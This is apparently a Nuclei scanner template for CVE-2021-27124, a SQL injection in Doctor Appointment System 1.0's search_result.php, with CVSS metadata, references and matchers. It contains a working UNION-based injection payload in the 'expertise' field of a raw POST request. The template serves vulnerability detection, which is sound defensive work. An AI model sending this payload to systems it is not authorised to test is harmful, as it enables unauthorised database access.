id: CVE-2021-27124 info: name: Doctor Appointment System 1.0 - SQL Injection author: theamanrawat severity: medium description: | SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html - https://packetstormsecurity.com/files/161342/Doctor-Appointment-System-1.0-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2021-27124 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-27124 cwe-id: CWE-89 epss-score: 0.02262 epss-percentile: 0.88413 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system http: - raw: - | POST /patient/search_result.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded expertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit= matchers-condition: and matchers: - type: word part: body words: - "c8c605999f3d8352d7bb792cf3fdb25b" - "Doctor Appoinment System" condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a0046304402206874035810761df0f729e205dbe8aff1fd104ccb659dd500d93e92b9130938fc02207390d91f7be5ce71f4f7ce7f9899d6d6f5d7977e44c14458d90ae28c787e7eee:922c64590222798bb761d5b6d8e72950